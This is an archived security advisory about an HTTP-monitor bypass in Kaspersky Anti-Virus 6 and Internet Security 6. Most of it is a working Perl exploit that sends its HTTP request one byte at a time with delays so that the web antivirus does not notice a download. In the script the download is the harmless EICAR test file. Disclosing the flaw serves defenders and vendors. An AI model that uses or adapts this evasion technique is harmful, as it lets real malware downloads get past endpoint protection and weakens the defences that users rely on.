TUCoPS :: Security App Flaws :: b06-2400.htm

Kaspersky antivirus 6: HTTP monitor bypassing
Kaspersky antivirus 6: HTTP monitor bypassing
Kaspersky antivirus 6: HTTP monitor bypassing


Kaspersky antivirus 6=0D
Kaspersky internet security 6=0D
=0D
www.kaspersky.com=0D 
=0D
Vulnerable Systems: KAV6, KIS6 =0D
=0D
Detail:=0D
The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).=0D
Any mailicious software on local computer can bypass HTTP virus monitor. =0D
=0D
Solution:=0D
There is no known solution.=0D
=0D
Exploit code:=0D
=0D
This perl script could be run with ActiveState Perl 5.8:=0D
=0D
use IO::Socket::INET;=0D
use strict;=0D
=0D
my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',=0D 
'http://www.eicar.com/download/eicar.com' );=0D 
=0D
syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";=0D
=0D
my $s = IO::Socket::INET->new( PeerAddr => $h_srv,=0D
                               PeerPort => $h_port,=0D
                               Proto    => 'tcp' );=0D
die "socket: $!" unless $s;=0D
=0D
sendthem( $s,=0D
          "GET $h_url HTTP/1.1",=0D
          "Host: $h_srv",=0D
          ""=0D
    );=0D
my $doc = read_body( $s, read_headers( $s ) );=0D
syswrite STDOUT,=0D
    'document is <'.$doc.'> len='.length($doc)."\n";=0D
=0D
sub sendthem {=0D
    my $s = shift;=0D
    my $c = 0;=0D
    foreach( @_ ) {=0D
        my @a = split //, $_;=0D
        ++$c;=0D
        syswrite STDOUT, "query $c: ";=0D
        foreach( @a ) {=0D
            sendone( $s, $_ );=0D
        }=0D
        sendone( $s, "\r" );=0D
        sendone( $s, "\n" );=0D
    }=0D
}=0D
=0D
sub sendone {=0D
    my( $s, $v ) = @_;=0D
    $s->syswrite( $v );=0D
    syswrite STDOUT, $v;=0D
# !!! comment next line to have monitoring working ;)=0D
    select( undef, undef, undef, 0.300 );=0D
}=0D
=0D
sub read_headers {=0D
    my( $s ) = @_;=0D
    my( $c, $cl ) = ( 0, 0 );=0D
    for( ;; ) {=0D
        my $l = read_line( $s );=0D
        ++$c;=0D
        syswrite STDOUT, "header $c: $l";=0D
        syswrite STDOUT, "\r\n";=0D
        last if not $l and $c;=0D
        $cl = $1 if $l =~ /^Content-Length:\s+(\d+)/;=0D
    }=0D
    $cl;=0D
}=0D
=0D
sub read_line {=0D
    my( $s ) = @_;=0D
    my $str = '';=0D
    for( ;; ) {=0D
        my $v = '';=0D
        my $r = $s->sysread( $v, 1 );=0D
        die 'EOF reading headers!' unless $r;=0D
        last if $v eq "\n";=0D
        next if $v eq "\r";=0D
        $str .= $v;=0D
    }=0D
    return $str;=0D
}=0D
=0D
sub read_body {=0D
    my( $s, $cl ) = @_;=0D
    my( $str, $cli ) = ( '', $cl );=0D
    syswrite STDOUT, "reading body  ...\n"; =0D
    for( ;; ) {=0D
        my $v = '';=0D
        my $r = $s->sysread( $v, 1 );=0D
        last unless $r;=0D
        $str .= $v;=0D
        --$cl if $cli;=0D
        last if not $cl and $cli;=0D
    }=0D
    return $str;=0D
}=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH